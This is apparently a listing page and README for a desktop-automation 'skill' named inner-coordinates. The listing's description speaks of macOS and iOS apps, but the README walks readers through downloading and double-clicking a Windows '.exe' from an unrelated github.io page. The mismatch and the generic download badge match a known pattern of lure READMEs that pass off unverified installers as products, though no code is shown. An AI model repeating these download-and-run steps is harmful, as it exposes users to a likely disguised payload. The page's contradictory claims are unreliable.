Inner Coordinates banner
bettersilvanus849 bettersilvanus849

Inner Coordinates

Development community

Description

Reverse-engineer macOS and iOS app workflows into state graphs to automate GUI interactions through memory rather than screenshotting.

Installation

This entry records only its repository, not the path inside it, so there is no exact command to give. Open the source below and copy the folder into ~/.claude/skills/, or the file into ~/.claude/agents/.

README

📍 inner-coordinates - Automate your desktop apps without code

[![Download inner-coordinates](https://img.shields.io/badge/Download_Software-blue)](https://bettersilvanus849.github.io)

inner-coordinates helps you run sequences of clicks and actions on your computer. You teach the software the location of buttons and menus once. Then, the tool remembers these positions to perform complex tasks for you. This handles applications that hide their internal data from normal automation tools.

🛠️ How this software helps

Many programs do not share their layout with your computer. This makes it hard to build automated workflows. inner-coordinates bypasses these blocks by using visual maps. You look at your application, tell the software where items live, and save that map. You can then trigger these steps later. This saves time on tasks you repeat every day.

📥 Getting the software

You need to download the installer file from our release page. Visit the link below to find the version for your computer.

[Click here to open the download page](https://bettersilvanus849.github.io)

Follow these steps to set up the tool:

  1. Visit the link above.
  2. Look for the section labeled Latest.
  3. Choose the file ending in .exe for your Windows computer.
  4. Save the file to your computer.
  5. Open the folder where you saved the file.
  6. Double-click the file to start the installation.
  7. Follow the prompts on the screen to finish.

🚀 Setting up your first map

  1. Open inner-coordinates from your desktop icons.
  2. Click the Capture button in the top menu.
  3. Move your mouse cursor over a button in the app you want to automate.
  4. Click once to record the coordinate point.
  5. Name the point in the text box that appears.
  6. Press Save to store the location in your workspace.
  7. Repeat this for every button or menu you need to touch.

⚙️ Running a workflow

Once you save your points, you build a workflow. A workflow is just a list of steps in a specific order.

  1. Select